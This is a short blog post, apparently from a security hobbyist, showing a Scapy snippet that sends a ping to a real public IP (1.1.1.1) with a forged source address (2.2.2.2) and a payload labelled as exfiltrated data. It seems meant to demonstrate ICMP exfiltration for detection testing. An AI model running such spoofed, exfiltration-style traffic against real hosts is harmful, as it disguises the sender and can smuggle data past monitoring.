Dec 232020
 

Might be fun to put the EICAR test string here (example with source IP spoofing) :)

from scapy.all import *
send(IP(dst="1.1.1.1",src="2.2.2.2")/ICMP(type=8)/ (b"I Exfil Data Very Much"*1000))

Type 8 = ICMP Echo Request (“ping” as the noobs would say)

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

(required)

(required)